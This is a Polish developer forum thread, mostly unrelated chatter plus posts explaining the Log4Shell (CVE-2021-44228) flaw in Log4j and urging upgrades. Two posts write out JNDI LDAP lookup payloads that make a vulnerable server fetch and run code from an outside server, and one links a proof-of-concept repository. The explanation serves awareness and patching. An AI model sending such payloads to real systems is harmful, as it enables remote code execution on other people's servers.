Jeśli kogoś interesuje project Loom w Javce to zachęcam zarezerwować sobie czas w poniedziałek o 20 :D
@.andy: ja nigdy jakoś nie potrzebowałem personalizować nic poza toolbarem. Na początku swojej bytności na linuchu coś tam jeszcze mi się chciało doinstalowywać, teraz po prostu konfiguruję toolbara w Cinnamon i mam to co mi potrzeba: swicher pulpitów, odkrywcę pulpitu, godzinę. A KDE jakoś dla mnie odstaje jakością czcionki domyślnej (którą pewnie gdzieś tam można zmienić) i ogólną ciężkością.
Mój film na temat Log4j.
Jeśli nie wiesz o co chodzi w "Log4Shell" - tu zobaczysz przykłady.
Na czym polega błąd w bibliotece Log4j2? Jak może wyglądać podatny kod? Do czego można wykorzystać tą podatność? Co zrobić i jak się ochronić? W tym filmie t...
https://www.youtube.com/watch?v=sPa83lM7YJsO co chodzi z podatnością "log4j"?
Szybkie wyjaśnienie dla osób nietechnicznych.
Log4j to bardzo popularna biblioteka używana w aplikacjach stworzonych w języku Java.
Służy ona do zapisywania logów z działania programu.
Log to chronologiczny zapis tego co dzieje się w systemie informatycznym.
Może być przydatny podczas rozwiązywania problemów.
Kilka dni temu odkryto błąd w bibliotece.
Jeżeli w tekście, który został przesłany do biblioteki znajduje się odpowiednio zapisany adres do strony - to program spróbuje się z nim połączyć a następnie wykonać kod, który tam znalazł.
Wykorzystanie tego błędu jest banalnie proste.
Wystarczy, że do strony wyślesz ciąg: ${jndi:ldap://tutajadresdotwojegoserwera}
Log4j spróbuje wtedy połączyć się z Twoim serwerem i pobrać z niego plik, który następnie postara się uruchomić.
Ten plik może być złośliwy.
Ale jak ten adres dostaje się do serwera?
Czy muszę go przesłać przez formularz?
Niestety problem nie dotyczy tylko formularzy.
Każde miejsce, które pozwala na przesłanie tekstu może być podatne.
Atakujący próbują na oślep wysyłać ten tekst gdziekolwiek tylko jest to możliwe.
Podatnych jest tysiące serwerów i programów.
Z racji popularności biblioteki jest ona używana w wielu produktach.
Co możesz zrobić?
Sprawdź, czy nie pojawiła się aktualizacja do Twoich ulubionych aplikacji.
Jeśli jesteś programistą to zaktualizuj log4j do wersji 2.15.0.
Więcej technicznych informacji znajdziesz na stronie cert.pl.
Ps. Takie grafiki umieszczam też na Instagramie i Twitterze.
Nadaje się też do "programistyczne WTF" - lista odkrywanych problemów w log4j wydaje się nie mieć końca, właśnie wydano log4j 2.17: https://www.zdnet.com/article/apache-releases-new-2-17-0-patch-for-log4j-to-solve-denial-of-service-vulnerability/
No i pięknie
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
Kodzik: https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce/tree/main/src/main/java
Apache Log4j 远程代码执行. Contribute to tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce development by creating an account on GitHub.
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-RceDzień dobry, jak już ktoś rano wstanie do pracy, to niech zacznie dzień od przejrzenia dependów we wszystkich swoich projektach i trybie powiedziałbym pilnym bumpnie wersję log4j o ile używa do 2.15+. Warto też powiadomić inne zespoły, tak na wszelki wypadek. Opisałem na Twitterku więcej o tym RCE, to nie ma sensu przepisywać drugi raz:
TL;DR Jeżeli tak, to macie prawdopodobnie solidne RCE które można napisać w jakiś 3 linijkach (np. fake serwer LDAP z klasą z exploitem) wysyłając do waszej usługi wiadomość z adresem do tego serwera XD Coś w stylu:
logger.info("${jndi:ldap://127.0.0.1:1389/whatever}");
Teraz wystarczy że ten placeholder w jakiś sposób trafi do waszych logów od strony usera (wiadomości/niepoprawny input/wyjątki/adresy) i tak właściwie, to właśnie wszedł Wam do systemu.
Tymczasem pozostaje mi życzyć spokojnego piątku :)
https://twitter.com/yazicivo/status/1469393075768373255 potwierdzone, że bumpnięta Java neguje tylko te najprostsze konkretne ataki, ale dalej jest podatna na RCE wrzucane w innej postaci.
@maszrum: Spotkanie na razie odwołane przez Covid :(